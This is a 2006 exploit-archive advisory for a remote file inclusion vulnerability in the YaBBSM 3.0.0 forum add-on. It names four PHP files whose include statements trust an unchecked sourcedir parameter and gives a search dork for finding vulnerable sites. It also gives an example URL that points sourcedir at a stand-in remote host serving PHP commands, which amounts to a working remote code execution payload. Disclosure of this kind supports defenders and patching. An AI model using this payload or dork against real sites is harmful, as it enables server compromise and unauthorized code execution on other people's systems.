YaBBSM 3.0.0 (Offline.php) Remote File Include Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : YaBBSM 3.0.0 (Offline.php) Remote File Include Vulnerability
# Published : 2006-10-13
# Author : SilenZ
# Previous Title : phpBB ACP User Registration Mod 1.0 File Inclusion Vulnerability
# Next Title : phpBB Security <= 1.0.1 (php_security.php) Remote File Include Exploit

[DESCRIPTION] Remote file include vuln found by sZ [oct 09, 2006]
[SOFTWARE]    Supermod 3.0 for yabb
[VENDOR URL]  http://www.supermod.org
[DORK]        YaBBSM V2.5.0 // Powered by YaBBSM V2.5.0 Based on YABB SE
[NOTES]       greetz to: neo-vortex, sk0tie, icez, Solano College CIS students.
 

VULN:
Offline.php
include("$sourcedir/pclzip.lib.php");
They forgot to include settings.php, this file seems to not exist sometimes.
 
VULN:
Sources/Admin.php
include_once("$sourcedir/Recent.php");
 
VULN:
Sources/Offline.php
include_once("$sourcedir/Recent.php");
 
VULN:
content/portalshow.php
include_once "$sourcedir/Calendar.php";
 
[EXAMPLE] http://site.com/community/Offline.php?sourcedir=http://shellurl.com/phpcommands.txt?

# www.Syue.com [2006-10-13]